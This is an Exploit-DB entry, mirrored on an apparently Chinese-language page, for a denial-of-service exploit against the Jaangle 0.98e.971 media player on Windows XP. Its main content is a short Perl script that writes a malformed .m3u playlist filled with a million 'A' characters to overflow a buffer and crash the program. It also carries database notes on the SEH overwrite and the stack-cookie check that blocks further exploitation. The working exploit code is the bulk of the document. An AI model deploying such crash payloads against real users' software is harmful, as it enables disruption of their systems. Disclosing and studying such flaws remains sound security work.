Jaangle 0.98e.971 – Denial of Service

• Exploit Database
• 16 阅读

• 作者： s-dz
  日期： 2010-08-02
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14525/

• #!/usr/bin/perl
  # jaangle 0.98e.971
  # Author: s-dz, s-dz@hotmail.fr
  # Download : http://www.jaangle.com/files/jsetup.exe
  # Tested : Windows XP SP2 (fr)
  # DATE : 2010-08-02
  #
  # thanks TCT , DGM8
  #
  # Exploit-DB Notes:
  # 0012B448 00410041A.A.jaangle.00410041
  # 0012B44C 00410041A.A.Pointer to next SEH record
  # 0012B450 00410041A.A.SE handler
  # 0012B454 00410041A.A.jaangle.00410041
  # The overwrite is caused by a wsprintfW() function, however the program checks
  # for a XOR'd DWORD at ESP+7D8 with DS:[601E60] (if not matched --> TerminateProcess).
  # Having control over the SEH does not actually cause any exception between wsprintfW()
  # to TerminateProcess().
  
  my $file= "mahboul-3lik00.m3u";
  my $junk= "\x41" x1000000;
  
  open($FILE, ">$file");
  print($FILE $junk);
  close($FILE);
  print("exploit created successfully");